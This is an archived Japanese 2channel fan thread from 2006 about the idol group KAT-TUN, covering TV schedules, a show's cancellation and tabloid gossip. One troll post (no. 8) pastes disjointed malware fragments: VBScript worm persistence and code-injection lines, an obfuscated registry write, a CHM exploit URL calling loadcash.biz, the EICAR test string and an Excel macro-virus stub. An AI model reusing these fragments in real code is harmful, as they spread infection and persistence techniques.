5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Cartoon【571】

1 :(´∀‘)・゚ρ゚)⌒ー⌒)♯・A・)・ω・`)冫、 ):2006/12/26(火) 11:04:27 ID:CM1fIFXS
◆運営ルール◆
※ sage進行 ※
 950踏んだ人が次スレ立て→スレ立て中はレスを控える事
 (950が無理だったらホスト報告で次が立てに行く)

※リサイクル禁止※
以下のスレは削除依頼してリサイクルとしても使用しない事
 1. 宣言無しに立てられたスレ、2. 950以前に立ったスレ、3. 明らかに安置が立てたと思われるスレ
 一度削除依頼したスレについては、その後レスもつけず完全不干渉でお願いします

※正式なスレが重複した場合は時間が早いもののみ使用 ※
  後に立ったスレはリサイクルせず削除依頼

◆厳禁事項◆
※ 実況(放送中にその番組を話題にする事)は鯖に負荷が掛かるので厳禁
 →CMに関してはCMが終わってからモチついて話題にする事
  (番組放送中でも可、但し番組名は出さず局のみ)

◆確認メモ◆
正式な天麩羅は「お約束」と「深山のためのガイドライン」と「お仕事一覧」のみ

カツンまとめサイト ttp://www2.atwiki.jp/kat-tun/
オリコン加盟店 ttp://www.oricon.co.jp/rank/index2.html
お仕事一覧 ttp://members2.tsukaeru.net/cartoon/cgi-bin/oshigoto.cgi

Cartoon【570】
http://tv7.2ch.net/test/read.cgi/jr/1164848684/l50

2 :(´∀‘)・゚ρ゚)⌒ー⌒)♯・A・)・ω・`)冫、 ):2006/12/26(火) 11:05:05 ID:CM1fIFXS
◆◇◆お約束◆◇◆
カツン全員だいしてる方のみドゾー
・カツンに無関係な雑談・「イラネ」「氏ね」・担決め・同人話・女ネタは禁止
・脊髄反射・一言レス・過度な馴れ合いは控える
・メンバー内や他ユニットJrとの比較は避ける
・折木話・マガ話は該当スレでおながい
・甜菜・煽り・モメサは放置が基本、合言葉はマタ-リマタ-リ
・担決め・ナリ・コピペ・マガ厨は徹底スルー
・深山厨チャソへの対応はスルーもいいが「氏ね」「ロムれ」は避けてやんわりと
・他スレ不干渉
◆◇◆深山のためのガイドライン◆◇◆
・カツンスレには常駐の荒氏がいます
 コピペ、全くスレ違いのレス
 スレ住人になりきっての鬱レス、争いレス、担括りレス
 人格を使い分けての自演などさまざまな手段で荒らしてきます
 PC、携帯を使って短時間で自演してきますが
 住人はスルーしていますので惑わされないよう頼みます
 ・避難所での住人による話し合いでスレタイは「Cartoon」ということで決定済み
 これ以外のタイトルで立てられたスレは本スレとは見なさない方向です
・ここはチャットではないので呼び掛けや自分語りはヤメレ
・板やスレ内での用語などへの質問等は 「くだらない質問はここへ」のスレへGO
・半年ロムれと言われたらおとなしく半年ロムれ
・過去ログ嫁と言われたらおとなしく嫁

3 :(´∀‘)・゚ρ゚)⌒ー⌒)♯・A・)・ω・`)冫、 ):2006/12/26(火) 11:06:00 ID:CM1fIFXS
過去ログ
【1-560】http://jbbs.livedoor.jp/bbs/read.cgi/music/1521/1105007438/159
【561】http://tv7.2ch.net/test/read.cgi/jr/1151987047/
【562】http://tv7.2ch.net/test/read.cgi/jr/1152629048/
【563】http://tv7.2ch.net/test/read.cgi/jr/1153403080/
【564】http://tv7.2ch.net/test/read.cgi/jr/1154248668/
【565】http://tv7.2ch.net/test/read.cgi/jr/1155776396/
【566】http://tv7.2ch.net/test/read.cgi/jr/1157356989/
【567】http://tv7.2ch.net/test/read.cgi/jr/1158595206/
【568】http://tv7.2ch.net/test/read.cgi/jr/1160667104/
【569】http://tv7.2ch.net/test/read.cgi/jr/1162859078/



4 :(´∀‘)・゚ρ゚)⌒ー⌒)♯・A・)・ω・`)冫、 ):2006/12/26(火) 11:06:49 ID:CM1fIFXS
【12月】
26(火)KAT-TUNスタイル(俺愛オム)・KAT-TUN'S MANUAL更新(ロ)・ズームイン・Happy!2(俺愛)・
    朝ズバッ!・はなまるマーケット・ピンポン・2時っチャオ・イブニングファイブ(俺愛/Happy!2 番宣)・
    high fashion(俺愛オム爺)
27(水)KAT-TUNスタイル(俺愛オム)・R-One KAT-TUN(ロ爺)・ズームイン・
    ダンス甲子園PR(16:00-16:53)
28(木)KAT-TUNスタイル(俺愛オム)・(TBS「クリスマスの約束」僕街/23:32-25:24)
29(金)KAT-TUNスタイル(俺愛オム)・ダンス甲子園PR(26:15-26:25)
30(土)復活!高校生制服対抗ダンス甲子園・メレンゲの気持ち蔵出しSP(目)
31(日)ジャニーズカウントダウン2006-2007・新春ドラマSP特集(オム/10:50-12:00)
   
【1月】
02(火)徳光&所の世界記録工場パート3(目)
04(木)SEVENTEEN
06(土)新春SPドラマ白虎隊(オム)・今夜いよいよ白虎隊!(オム/10:55-11:45)・
    ぷれミーヤ新春SP(オム/15:00-16:30)・今夜いよいよ白虎隊!(オム/福島・15:40-16:00)
    白虎隊PR(オム/めんたい・12:55-13:00)・白虎隊PR(オム/めんたい・17:55-18:00)・
07(日)新春SPドラマ白虎隊(オム)・YOUたち!(オム爺)・ザ少年倶楽部(爺/BS2)・
    白虎隊裏話(オム/15:30-16:00)
09(火)ザ少年倶楽部(爺/BShi)
14(日)ザ少年倶楽部(爺/BS2)
16(火)ザ少年倶楽部(爺/BShi)
21(日)ウタワラ
28(日)ウタワラ

5 :ユー&名無しネ:2006/12/26(火) 11:34:11 ID:PvExpv9B
>1
乙鰈!

6 :ユー&名無しネ:2006/12/26(火) 23:52:45 ID:0QqITOgX
このスレはカツンに監視されています

   |  |                 |  |∧_∧
   |  |                 |  |´・ω・`)
   |  |                 |  | o  o
   |  |∧_∧ _∧    ∧_∧∧_∧|  | m_m
   |_|´∀‘)・゚ρ゚). (#・A(⌒ー|_| [.lШШl]
   |  | o【◎】⊂     ( っ (  o|  |(冫、 *)
   | ̄|―u'―u      `u  `u.| ̄||| | | | |

7 :ユー&名無しネ:2006/12/26(火) 23:53:53 ID:0QqITOgX
>1

       ハ,_,ハ
      ,:' ´∀‘;~/^l'"'"~/^i'゙ヾ       ハ,_,ハ
      ミ,;:.   ,ッ         ゙ヾ    :・A・#';
  ,.''"'"'i^゙ヽ''''l^゙ヾ   ・ω・  /^l'"'"~/^i'ツ'c:,  ;
..r'           ゙ヽ    ヾ        ι..' ヾ
ミ_     ・ ゚ ρ ゚ ミ~"'~"~"'ミ ⌒ ー ⌒      彡
ミ    _       ッ: 冫、*;:ッ       _    ミ
ヽ.,,_  ヾ,_,,)   .,ミ_`)O O(´彡,.     (,,_,ノ  _,,.ヽ
  `゛゛゙''''゛゛''゙'゛'゛   "'゙''"゙''"".  "'"'゙''""''''゙""´

8 :<body onload=window()>:2006/12/27(水) 06:45:13 ID:0TZYEtf8
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

9 :ユー&名無しネ:2006/12/27(水) 13:53:42 ID:eI+sfLDi
>1


10 :ユー&名無しネ:2006/12/27(水) 17:58:17 ID:tzFwPIsi
>4
1/12(金)オリコンスタイル

11 :ユー&名無しネ:2006/12/27(水) 22:42:39 ID:QTVQGsEX
>4
ドキュモパンフ1月号
CMラストの6人並びパターン違い

12 :ユー&名無しネ:2006/12/28(木) 00:38:27 ID:xCHuu26U
前スレ>1000
UN素早く詰め込んでGJ(w

13 :ユー&名無しネ:2006/12/28(木) 01:45:48 ID:hW1Md6dv
>1
乙です

前スレ終わりのグダグダ感ワロス(w

14 :ユー&名無しネ:2006/12/28(木) 07:45:24 ID:CrBkHUI6
ウタワラ終了

15 :ユー&名無しネ:2006/12/28(木) 09:43:46 ID:qgzP05Hz
ウッチャンが謎解きに挑戦…日テレ系2月「イッテQ!」

タレントの内村光良(42)が司会する日テレ系「世界の果てまでイッテQ!」(日曜・後7時58分)が
来年2月4日にスタートすることが27日、分かった。

同番組は1月末に終了する音楽バラエティー番組「ウタワラ」の後を継ぐもので、
子供の素朴な疑問を、海外にまで足を運んで、解明するという謎解き冒険バラエティー。
05年10月からの深夜番組、9月の2時間特番を経て、ゴールデンに進出することになった。

第1回は、ボビー・オロゴン(33)と昆虫好きの小学生がホタルの光で勉強ができるか、
ベッキー(22)と焼き芋好きの女の子が、灼(しゃく)熱の砂漠で、焼き芋は焼けるかを探る。

お笑いコンビ「オセロ」とともに司会する内村は「世界に存在するさまざまな不思議。
その謎を解き明かしていくのが、この番組です。みなさんの解明してほしい『謎』、
大募集しますので、どんどん番組に寄せてください」と話している。

http://hochi.yomiuri.co.jp/entertainment/news/20061228-OHT1T00030.htm

16 :ユー&名無しネ:2006/12/28(木) 09:58:48 ID:xCHuu26U
終了というより打ち切り感が否めないorz

17 :ユー&名無しネ:2006/12/28(木) 10:04:55 ID:aFRpmQ2G
なんでこんなに急な打ち切りなんだろう?
時期がおかしいよね

18 :ユー&名無しネ:2006/12/28(木) 10:19:44 ID:lrCVcC/c
>1乙

打ち切りだろうな。原因は数字。
空きそうな(移れそうな)枠もいまんとこ茄子。


19 :ユー&名無しネ:2006/12/28(木) 10:32:39 ID:4SeSutPU
打ち切りだとしても1月末ってのが明らかにおかしい
どうせ1月前半は特番で潰れるから終了なら12月でもよかっただろうに
早めに知れ渡るのはマズーだたのかな?
12月は僕街やらダンシ甲子園があるから延命したのか?

20 :ユー&名無しネ:2006/12/28(木) 10:41:38 ID:TfHncsMU
ずっと低迷してたのに結構長かったね
迷走っぷりが凄かったな

21 :ユー&名無しネ:2006/12/28(木) 10:45:25 ID:WptIC9k5
出演者も視聴者も随分振り回されたな…

22 :ユー&名無しネ:2006/12/28(木) 11:02:10 ID:LpnsYakg
嘘つきオムがいるから打ち切りになったんだよ

23 :ユー&名無しネ:2006/12/28(木) 11:13:32 ID:hvr9wC4a
目のレギュラー番組はゼロか?

24 :ユー&名無しネ:2006/12/28(木) 11:13:39 ID:4SeSutPU
個人活動が増えてきたのは嬉しいがユニ活動見れないのはツライ
紺もないし歌番組待つしかないのか?
ヘタしたら次の新曲発売までおあずけかよ…orz

25 :ユー&名無しネ:2006/12/28(木) 11:28:31 ID:HT/8uu3Z
カツン担当スタッフがタレのスケやプライベートをワンピース同人日記のほうに垂れ流していた
今回の件で$としての商品価値が一番落ちたのがカツンのN
http://tv7.2ch.net/test/read.cgi/jr/1159185153/

26 :ユー&名無しネ:2006/12/28(木) 12:05:44 ID:Lh/PM9GQ
打ち切りは目の金曜日のせい

27 :ユー&名無しネ:2006/12/28(木) 12:07:27 ID:55VTbRg1
>26
ありえる話ktkr

28 :ユー&名無しネ:2006/12/28(木) 12:09:37 ID:BfCGTN8s
>>26
まあ、そうとしか考えられない
数字が原因なら12月で終わりにするか3月末まで引っ張るだろう
スポンサーからクレームが出て引き延ばせなくなったんだろうね

29 :ユー&名無しネ:2006/12/28(木) 12:10:53 ID:TfHncsMU
717:ユー&名無しネ :2006/12/28(木) 09:38:32 ID:Lh/PM9GQ
やっぱりキョンとの金曜日がきいたんじゃないの?
目はGの足引っ張ってるよな
721:ユー&名無しネ :2006/12/28(木) 12:07:58 ID:Lh/PM9GQ
どう考えても目キョン同棲の金曜日のせいなんだがな

30 :ユー&名無しネ:2006/12/28(木) 12:33:01 ID:cCLF+lP+
さすがにその言い訳は厳しい

31 :ユー&名無しネ:2006/12/28(木) 12:51:01 ID:WptIC9k5
無理やり結びつけるなよ(w

32 :ユー&名無しネ:2006/12/28(木) 13:09:15 ID:LpnsYakg
ウタワラはカツンだけの番組じゃナス
今まで続いたのが奇跡

33 :ユー&名無しネ:2006/12/28(木) 13:14:27 ID:LpnsYakg
そう言えばこの枠に志村動物園を移動しようとしたら
みのさんからクレーム来たとこないだ読んだのに
ウタワラ枠なことすっかり忘れてた

34 :ユー&名無しネ:2006/12/28(木) 13:20:14 ID:Lh/PM9GQ
>29
目厨乙!(w

35 :ユー&名無しネ:2006/12/28(木) 13:44:49 ID:1PwkRGhk
なんでみのさんから?

36 :ユー&名無しネ:2006/12/28(木) 13:50:55 ID:LpnsYakg
みのさん裏で動物の番組やってるから
かぶるからみたい

37 :ユー&名無しネ:2006/12/28(木) 14:21:53 ID:nE2vD0DW
ちょ今知った…
まさかの終了てどうなるのカツンは…_| ̄|○


38 :ユー&名無しネ:2006/12/28(木) 14:34:42 ID:lrCVcC/c
案外知らないカツン担多いかもね


39 :ユー&名無しネ:2006/12/28(木) 14:43:39 ID:ahRyla8D
日テレ土7冠

40 :ユー&名無しネ:2006/12/28(木) 14:46:21 ID:S/6CC36m
>22 >26
は?バカじゃね?

41 :ユー&名無しネ:2006/12/28(木) 14:48:35 ID:xCHuu26U
>39
おソースあるの?

42 :ユー&名無しネ:2006/12/28(木) 15:13:00 ID:QL51WHPy
【芸能】小泉今日子 この人物のオモテとウラ(ゲンダイネット)

「え、ただのつまみ食いじゃなかったの?」――これが報道を見た大多数の感想だろう。
小泉今日子(40)がまだ亀梨和也(20)と続いていた。

 亀梨といえば、現在ジャニーズ事務所のトップアイドル。最初に“年の差交際”が報じられた頃は、
「稼ぎ頭の交際をジャニーズ事務所が許すわけがない」「その辺は小泉も承知の火遊び」とみられていた。
ところが、その小泉がいまだにかいがいしさを見せていた。最新号の「フライデー」によると、
現在の小泉は亀梨とほぼ“半同棲”状態。オフの日には、自宅に亀梨が“帰って”くるのを
迎え入れるため、近所のスーパーで肉、野菜などを買い込む日々を送っている。

 小泉だって元トップアイドル。業界の常識は分かっているはずだが、素顔を知れば知るほど
「彼女は本気」という声が高くなるという。どういうことか。

続きはこのスレで
http://news18.2ch.net/test/read.cgi/mnewsplus/1167268343/l50

43 :ユー&名無しネ:2006/12/28(木) 15:15:53 ID:feM0ZziV
春に違う時間帯で冠番組が始まる為の準備だろ。

44 :【1月】:2006/12/28(木) 17:10:07 ID:FWrgbybC
01(月)KAT-TUNスタイル(俺愛オム)・DoCoMoパンフレット1月号
02(火)KAT-TUNスタイル(俺愛オム)・KAT-TUN'S MANUAL更新(爺)・徳光&所の世界記録工場パート3(目)
03(水)KAT-TUNスタイル(俺愛オム)・R-One KAT-TUN(ロ爺)
04(木)KAT-TUNスタイル(俺愛オム)・SEVENTEEN
05(金)KAT-TUNスタイル(俺愛オム)
06(土)新春SPドラマ白虎隊(オム)・今夜いよいよ白虎隊!(オム/10:55-11:45)・
    ぷれミーヤ新春SP(オム/15:00-16:30)・今夜いよいよ白虎隊!(オム/福島・15:40-16:00)
    白虎隊PR(オム/めんたい・12:55-13:00)・白虎隊PR(オム/めんたい・17:55-18:00)・
    WINK UP・DUET・POTATO
07(日)新春SPドラマ白虎隊(オム)・YOUたち!(オム爺)・ザ少年倶楽部(爺/BS2)・
    白虎隊裏話(オム/15:30-16:00)
08(月)KAT-TUNスタイル(俺愛オム)
09(火)KAT-TUNスタイル(俺愛オム)・KAT-TUN'S MANUAL更新(目)・ザ少年倶楽部(爺/BShi)
10(水)KAT-TUNスタイル(俺愛オム)・R-One KAT-TUN(ロ爺)
11(木)KAT-TUNスタイル(俺愛オム)
12(金)KAT-TUNスタイル(俺愛オム)・オリコンスタイル
14(日)YOUたち!(オム爺)・ザ少年倶楽部(爺/BS2)
15(月)KAT-TUNスタイル(俺愛オム)
16(火)KAT-TUNスタイル(俺愛オム)・KAT-TUN'S MANUAL更新(俺愛)・ザ少年倶楽部(爺/BShi)
21(日)YOUたち!(オム爺)・ウタワラ
23(火)KAT-TUNスタイル(俺愛オム)・KAT-TUN'S MANUAL更新(オム)・MYOJO・ポポロ・Kindai
28(日)YOUたち!(オム爺)・ウタワラ


45 :ユー&名無しネ:2006/12/28(木) 17:54:51 ID:XdqNwZb6
>43
準備があるにしても今の時期に打ち切る必要はなくね?

46 :ユー&名無しネ:2006/12/28(木) 18:04:06 ID:55VTbRg1
打ち切りって嫌な言葉だね…2007年カツンはどうなるの?
疫病神は誰にトリツイテイルンダ…

47 :ユー&名無しネ:2006/12/28(木) 18:16:35 ID:F7ZuZ9fM
>46
どう考えても目でしょ
伊藤美咲も綾瀬も気の毒

48 :ユー&名無しネ:2006/12/28(木) 18:46:14 ID:nE2vD0DW
今売ってる月刊ナビとかには1月28日のウタワラは終わりとは一言も書いてないのに
もうこれは急な打ち切りとしか考えられナス
来年のユニとしてのレギュラーが1つもないなんて本当にヤバい状況だよ

49 :ユー&名無しネ:2006/12/28(木) 18:53:00 ID:jqs6VE3Z
歪がドラマやるし友近もケコーンするし
あややも妊娠してるしカツンだけが悪いんじゃない

50 :ユー&名無しネ:2006/12/28(木) 18:56:31 ID:TfHncsMU
ヤバイと思うならカツサンキボンメルでもすればいいさ
2・3年のうちにまたレギュラー出来るんじゃないの

51 :ユー&名無しネ:2006/12/28(木) 19:39:18 ID:sMNFN0tV
西が戻って来ていない状況で
レギュラー番組はどうなんだろか...

52 :ユー&名無しネ:2006/12/28(木) 20:11:03 ID:xCHuu26U
>44
乙ですドゾーつ旦~

53 :ユー&名無しネ:2006/12/28(木) 20:40:16 ID:S/6CC36m
>47
全部西のせいだろスベテの始まりは

54 :ユー&名無しネ:2006/12/28(木) 21:03:18 ID:1B3T/rD0
>53
カツン担じゃない目担はユニスレに来ないでね

55 :ユー&名無しネ:2006/12/28(木) 21:06:31 ID:Hjz38EG+
>53
いやいや違うだろ
デブ早々金曜日されちまったのは誰でつか?
スキャンダルは一番スポンサーにチラわれるんだよ


56 :ユー&名無しネ:2006/12/28(木) 21:17:28 ID:cCLF+lP+
カツン担がいねえ

57 :ユー&名無しネ:2006/12/28(木) 22:44:13 ID:XdqNwZb6
今年の成功は24Hかな
何しても叩かれる1年だった

58 :ユー&名無しネ:2006/12/28(木) 23:11:02 ID:S/6CC36m
西のバカはデブ前から何度も撮られてるわけだが

59 :ユー&名無しネ:2006/12/28(木) 23:53:13 ID:kisuKH6O
そのバカの西もどっかの大バカみたいには
同じ相手で何度も撮られていないが

60 :ユー&名無しネ:2006/12/29(金) 00:08:35 ID:Hjz38EG+
>58-59
目糞鼻糞なワケだが

61 :ユー&名無しネ:2006/12/29(金) 00:10:24 ID:/ClFvVjq
子供みたいな喧嘩は止めなさい(w

62 :ユー&名無しネ:2006/12/29(金) 00:14:25 ID:MEPFFmNa
ユニスレってデビュ後スレ婆の縄張りだったんだ
おすすめ2ちゃんねる見るまで知らなかった…orz

63 :ユー&名無しネ:2006/12/29(金) 00:29:56 ID:gg+tyfG/
女ネタとか担決めとかお約束守れてないヤシはわざとだろうけど
せめて緑とか全角とか鏝ってるヤシとか何とかならないものかね

64 :ユー&名無しネ:2006/12/29(金) 00:47:50 ID:TUfsy8+x
おかしい書き込みの方が数多いから余計目立つな

65 :ユー&名無しネ:2006/12/29(金) 01:06:24 ID:8haxdyeT
>62
おすすめ2ちゃんねるとやらが何なのかわからない自分にkwsk
ユニスレ住人がデブ後住人とかぶると紹介されてたとか?

66 :ユー&名無しネ:2006/12/29(金) 01:23:28 ID:r+tJei5w
小田サンの僕街もヨカタね

67 :ユー&名無しネ:2006/12/29(金) 01:26:02 ID:87Apct0h
専ブラだと分からないかもだけど
今、避難ゴーゴーだねこれ


【迷惑】「おすすめ2ちゃんねる」反対!【悪害】
http://pc8.2ch.net/test/read.cgi/internet/1166603581/
■ (vip931あらため) 「おすすめ2ちゃんねる」 その5
http://qb5.2ch.net/test/read.cgi/operate/1167130349/

68 :ユー&名無しネ:2006/12/29(金) 01:42:09 ID:8haxdyeT
>67
d自分専ブラだから知らなかった
これって更新のタイミングに合った時の個人のよく行くスレが出てくるのか
そのスレの住人がよく行くスレの中の上位が出てくるのか…

これ以上はスレチか




69 :ユー&名無しネ:2006/12/29(金) 02:00:32 ID:5Z29Xmgw
>66
ヨカタね
しかし会場にいたお客サソ一緒に歌っててビックリしたよ
カツンファン…なわけないか(w

70 :ユー&名無しネ:2006/12/29(金) 02:09:29 ID:r+tJei5w
>69
泣いて種。・゚・(ノД`)・゚・。

71 :ユー&名無しネ:2006/12/29(金) 02:43:37 ID:qtKwsIrX
小田サソの僕街は想像通りでテラヨカタ
ヤパーリ僕街いいな

72 :ユー&名無しネ:2006/12/29(金) 08:55:24 ID:BJZExP5a
10年経っても色褪せない曲だな
本当にイイ曲を作って戴けた
10年経った時に6人で唄ってて欲しいと強く思った

73 :ユー&名無しネ:2006/12/29(金) 09:40:45 ID:GQRYTXjb
歌う前の小田さんの※も嬉しかった
「会ってみるとみんなそれぞれにとてもいい青年達でした
青春群像というテーマどおりみんな精一杯頑張ってくれていい曲ができたと思います
この曲を書かせてくれた彼らに感謝したいと思います」って
本当にこちらこそ感謝だ

74 :ユー&名無しネ:2006/12/29(金) 11:52:01 ID:pBtlpZAo
>39

514 :名無しでいいとも!@放送中は実況板で :2006/12/28(木) 02:41:05 ID:YB8DtqPV0

週刊アサヒ芸能 06.12.28 Xマス特大号 P.219

志村けんと「動物番組バトル」勃発!
「日テレは俺の貢献度をどう思ってるんだッ」

・・・日本テレビ関係者は頭を抱えて、こう話すのだ。
「木曜19時放送の『天才!志村どうぶつ園』を、来年の1月からは土曜か日曜に移動させる
という案があるんです。でも、これに思わぬ“問題”が発生して・・・」
「動物系の番組は家族で見ることが多いので、何とか土日のゴールデンタイムに持って
いきたいんです。現在は土曜の19時か、日曜の20時枠へ移動させようと調整中。ただ、
土曜19時は日テレにとって鬼門とされてるほどこれまで数字が取れなかった時間帯です。
しかも裏番組は、視聴率20%超えの実績もある教養クイズ番組『IQサプリ』(フジテレビ系)。
ここへぶつけるのは正直、厳しい。そこで日曜20時枠が俎上に上がった。こっちも裏には
『どうぶつ奇想天外!(TBS系)』があるが、『IQ−』ほどではない。ただ、司会がみのもんたさん(62)
であることが悩みのタネなんですよ」(前出・日テレ関係者)


75 :ユー&名無しネ:2006/12/29(金) 12:33:19 ID:e0vV57Wj




http://yaplog.jp/luna_moon99/archive/1031

http://yaplog.jp/luna_moon99/archive/990



76 :ユー&名無しネ:2006/12/29(金) 14:33:21 ID:zXs86bm0
>73
小田さんの※に目汁が。・゚・(ノД`)・゚・。
いい人に恵まれて本当にカツンは幸せ者だとおもたよ
小田さんの歌う僕街も良かったし
この先何年経っても心に残るんだろうな

77 :ユー&名無しネ:2006/12/29(金) 20:53:09 ID:TF/NA4oO
>73
小田さんこちらこそだ。・゚・(ノД`)・゚・。
デブ10周年記念に6人で歌って欲しい曲だとおもた

78 :ユー&名無しネ:2006/12/29(金) 21:38:07 ID:DQ1ENCzP
担ナリでカツン関連スレ荒らし回ってるのはP担と石鹸担ですよ

79 :ユー&名無しネ:2006/12/29(金) 22:06:30 ID:8haxdyeT
>78
そういうこと言わない
担決めすんな

21 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)